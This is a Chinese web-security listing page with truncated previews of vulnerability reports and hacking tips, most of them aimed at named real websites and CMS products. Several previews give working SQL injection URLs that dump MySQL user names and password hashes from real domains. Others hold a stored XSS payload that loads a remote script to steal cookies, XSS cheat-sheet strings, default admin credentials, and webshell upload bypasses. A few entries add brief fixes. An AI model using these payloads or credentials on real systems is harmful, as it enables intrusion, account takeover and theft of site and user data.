香港新浪SQL注射及修复 - 网站安全 - 自学php关注热度:30

由于没有对参数r进行有效的过滤从而导致SQL注入漏洞的产生。具体链接：http://game.sina.com.hk/cgi-bin/fl/ring.cgi?r=184626在r参数的后面添加12345=12345与12345=54321返回的结果是不一样的哦：http:/..[详情]

bbsxp上传过滤不严 可上传asp;jpg 文件 - 网站安全关注热度:24

登录账号后 发表新主题 添加附件 可以添加asp;jpg格式文件修复方案：管理在后台禁用附件上传 或者 在禁用上传类型中 添加类似asp;jpg php;jpg 等格式..[详情]

DiscuzX2个人空间图片EXIF信息XSS - 网站安全 - 自学关注热度:33

图片里插入非法的EXIF信息。你懂的xss漏洞产生。。。。。不过有点鸡肋，在特定条件下才能读取到EXIF信息。修复方案：过滤。。作者 safe121..[详情]

最佳东方post注入及爆路径 - 网站安全 - 自学php关注热度:29

http://sys.veryeast.cn/login.asp post注入输入#39;a 会看到意外的结果sql server 2008 还有其他的信息另外需要补充的是 主站也存在 www.2cto.comhttp://www.veryeast.cn/cms/Manage/Admin/Login.asp .....[详情]

CLscript CMS v3.0多重缺陷及修复 - 网站安全 - 自学关注热度:18

标题：CLscript CMS v3.0 - Multiple Web Vulnerabilities缺陷影响版本：8.6程序介绍:=============With the professionally developed Classified-Portal CLscript 3.0 can Visitors post Clas.....[详情]

淇晨科技网站管理系統默认漏洞 - 网站安全 - 自关注热度:29

365web樣版管理後端默认后台：cctmanage/login.php默认账户：cct95 28528980拿shell：系统自带上传文件采用本地验证，绕过就不用我说吧。opera、burp 其他什么的绕过www.2cto.com有些带ckfinder编辑器的..[详情]

Kesion cms注入漏洞 - 网站安全 - 自学php关注热度:19

函数过滤混乱导致注入Dim KS:Set KS=New PublicClsDim ActionAction=KS.S(Action)Select Case ActionCase Ctoe CtoECase GetTags GetTagsCase GetRelativeItem GetRelativeItem //问题函数.....[详情]

中关村在线博客子站SQL注入及修复方案 - 网站安关注热度:17

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7.....[详情]

时时送订单系统后台登陆框post注入及修复 - 网站关注热度:22

订单系统存在登陆框注入，然后订单root权限，数据库等一些信息，然后进一步渗透修复方案：加强过滤验证作者 also..[详情]

整理了一些XSS跨站代码 - 网站安全 - 自学php关注热度:27

!-- --!input value=img src=xx:x onerror=alert(1)//script/onload=alert(1)/script IE9style/onload=alert(1)alert([0x0D]--[0x0D]1!--[0x0D])1!--idocument.write(#39;img src=.....[详情]

图虫网存储xss 可获取cookies - 网站安全 - 自学ph关注热度:16

危害大吧, cookies只要拿到了 账号+MD5密码就到手了,然后......详细说明：http://tuchong.com/settings/注册了在这里配置: 在标签处插入:ascript/src=//tmxk.org;!--a保存.个人主页触发了 哦\(^o^)/~ht.....[详情]

乐峰网用户认证体系存在逻辑漏洞，可修改任意关注热度:20

乐峰网用户认证体系存在逻辑漏洞，可修改任意用户密码本来单条漏洞不至于到15，但是这里考虑到 利用难度，影响范围，重复利用等影响方面，并且攻击的是用户的认证体系。所以自..[详情]

网店管家3.0，网站帐号密码泄露，可以导致授权关注热度:57

网店管家3.0，是一款集京东、淘宝商城、淘宝集市店为一体的电子商务ERP软件！其中用户不乏有一些所谓的大卖家！但是在授权码保护上却做的一般！当购买网店管家授权码之后，授权..[详情]

风讯V5.0存在注射漏洞 - 网站安全 - 自学php关注热度:22

漏洞文件customform/CustomFormJS.asp?CustomFormID=11FormStyleID=35DataStyleID=35FS_MF_Admin 管理员表段Admin_user 管理用户字段www.2cto.comAdmin_Pass_Word 管理员密码字段修复：过滤验证作者 Jmkis.....[详情]

xheditor默认upload.php畸形文件上传漏洞 - 网站安全关注热度:62

该文件上传代码使用白名单机制按道理说是比较安全的，但是问题出现在白名单机制验证那里。使用正则匹配这里就给了我们绕过的方法在借个iis解析特性即可获取一个shell。验证代码：..[详情]

记事狗盲注及任意文件删除 - 网站安全 - 自学p关注热度:16

0x1 盲注0x2 任意文件删除0x1 盲注在modules/ajax/topic.mod.php中function Group_fields() { $uid = MEMBER_ID; $g_id = $this-Post[#39;gid#39;]; $touid = $this-Post[#39;touid#39;]; .....[详情]

一次遭受DDOS入侵后的VPS急救与数据恢复 - 网站安关注热度:20

对于使用VPS服务的人来说，数据就是生命。除了日常进行数据备份外，掌握一些数据抢救的方法，也能在很大程度上减少损失。本人某一台VPS在不久前受到了DDOS攻击，随后马上收到来自..[详情]

桃园网盘通杀批量getshell - 网站安全 - 自学php关注热度:24

第一：先看是否有可以测试的 账户如果有，点击 文件管理rarr;上传rarr;然后上传ashx马上传之后马的路径在。http://www.2cto.com /myfile/guest/madman.ashxguest是账户myfile 是默认的上传文件保存目录..[详情]

游戏网娱乐平台有CKFinder编辑器漏洞 - 网站安全关注热度:19

游戏网娱乐平台 有CKFinder编辑器 漏洞 可导致拿shell http://www.youxi.com/ckfinder/ckfinder.html漏洞页面修复方案：如何修复就不用我说了作者 邪少..[详情]

Sina.Com某分站及Tom某分钟注入 - 网站安全 - 自学关注热度:27

sina的挺弱的一个洞应该算是BUG了，猪肉没用的。详细说明：http://wap.sina.com.cn/cms/demo.php?pid=3075from=874太弱。http://wap.sina.com.cn/cms/demo.php?pid=3075%20and%201=1from=874http://wap.sina.c.....[详情]

DiscuzX1.5+ 道具刷分漏洞 - 网站安全 - 自学php关注热度:23

如果用户组设置了购买道具折扣选项，买入时的价格是打折后的价格，卖出时的价格是未打折的价格。 也就是买的时候打折了，卖的时候是原价。买入：$magic[#39;discountprice#39;] = $_G[#39..[详情]

记事狗微博后台拿shell - 网站安全 - 自学php关注热度:26

记事狗微博系统，后台存在设计缺陷，可导致进入后台者获得shell1.系统工具-数据备份-自定义备份-选择一张数据量较小的表-更多选项-选择压缩备份文件-多分卷压缩成一个文件2.在备份..[详情]

通过IIS禁止下载MDB数据库 - 网站安全 - 自学php关注热度:26

打开IIS服务管理器，选择需要设置的站点－属性－主目录选项卡。点击中下方的配置按钮，弹出应用程序配置窗口，在应用程序映射选项卡中点击下方的添加按钮，弹出添加/编辑应用程..[详情]

DB_OWNER权限下网站与数据库分离获取mssql服务器关注热度:16

现在注入横飞.工具一大堆,过去手工注入的时代已经不复存在.代之的是NBSI HDSI 啊D注入工具..等等.也是广大菜鸟的最爱了.即使什么也不会.什么也不懂.只需要点几下鼠标.存在注入漏洞的..[详情]

SA权限web和db分离的一些思路 - 网站安全 - 自学关注热度:15

当你碰到SA的注入点，可以执行命令，但是web与数据库分离，你都会怎么做呢，当数据库不服务器不能连接外网的时候，是不是只想着从web搞呢，这篇文章从t00ls转载过来，希望对大家..[详情]

LFI本地包含漏洞利用小技巧 - 网站安全 - 自学p关注热度:21

0times;00 题外话嘿嘿 希望大家多多探讨技术。0times;01 PHP Input/Ouput Wrapper 远程包含函数执行命令详细：PHP 的include()函数存在设计缺陷，远程攻击者可以利用这个漏洞可能以WEB 权限执行任意..[详情]

网站解压上传漏洞一种新突破 - 网站安全 - 自学关注热度:16

本来是搞一个站，linux+php+Sybaser。进后台后有上传，正常的在上传图片哪我是想尽了各种办法也没有突破，不过该站还有一种上传，看图1但是把c.php放在压缩包里后它还会给你自动变成..[详情]

去哪儿任意文件读取（基本可重构该系统原工程关注热度:20

可读取到WEB-INF目录下文件,那么这个系统结构基本就明朗了（同时分层结构的缺点也体现出来了！）先读取Tomcat容器的web.xml（因为你们网站web服务器架构基本都是Nginx + Tomcat），以便了解..[详情]

友人网分站存在 sql注入导致部分信息泄露 - 网站关注热度:17

友人网分站存在sql注入导致部分信息泄露详细说明：http://observe.younet.com/view.php?page=23id=-44596+uNioN+alL+sEleCT+1,2,3,concat(user,0x3a,password),5,6 from mysql.user limit 2,1--http://obse.....[详情]

管家婆软件官方网存在SQL注射及弱口令 - 网站安关注热度:35

管家婆搞活动的页面，选漂亮的财务MM和帅蝈蝈，获奖的出国旅游呀！！！俺向二师兄保证绝对木有看MM的手机号。。。http://www.grasp.com.cn/talent/TalentDetail.aspx?c=bb7f3776-61e0-4733-9645-28927d7ee..[详情]